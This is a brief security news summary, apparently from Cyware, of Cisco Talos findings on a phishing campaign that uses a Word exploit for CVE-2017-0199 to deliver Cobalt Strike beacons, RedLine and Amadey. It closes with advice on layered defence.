Cisco Talos spotted a malicious attack campaign in August delivering Cobalt Strike beacons, which could be used in later campaigns. Now, the researchers observed another modular campaign that has been delivering Cobalt Strike on infected endpoints.

Diving into details

The attack begins with a phishing email containing the job details of a government organization in the U.S. and a trade union in New Zealand.
  • The phishing email is laden with a malicious Word doc with an exploit for CVE-2017-0199.
  • The payload is a leaked Cobalt Strike beacon version, which includes commands to perform targeted process injection of arbitrary binaries.
  • It, furthermore, has a high reputation domain configured, displaying the redirection methodology to hide the beacon’s traffic.
  • Other payloads observed include the RedLine infostealer and Amadey botnet.

Why this matters

  • Using Cobalt Strike in the infection chain enables threat actors to merge their malicious traffic with legitimate traffic and evade detection.
  • This campaign is a standard example of an attacker generating and executing malicious scripts in the victim’s system memory. 

Cobalt Strike in news

  • Earlier this month, researchers observed hackers increasingly adopting Sliver and dumping Cobalt Strike. The change was caused due to improved defenses against Cobalt Strike. 
  • Last month, a new attack framework, named Manjusaka, popped up, which claimed to be the sibling of Cobalt Strike and Sliver.

The bottom line

Cobalt Strike is a modularized attack framework and customizable, allowing threat actors to remove or add features as per their malicious intents. Cisco Talos recommends organizations be extremely vigilant and execute layered defense to block attackers’ attempts in the earlier stages of the infection chain.
Cyware Publisher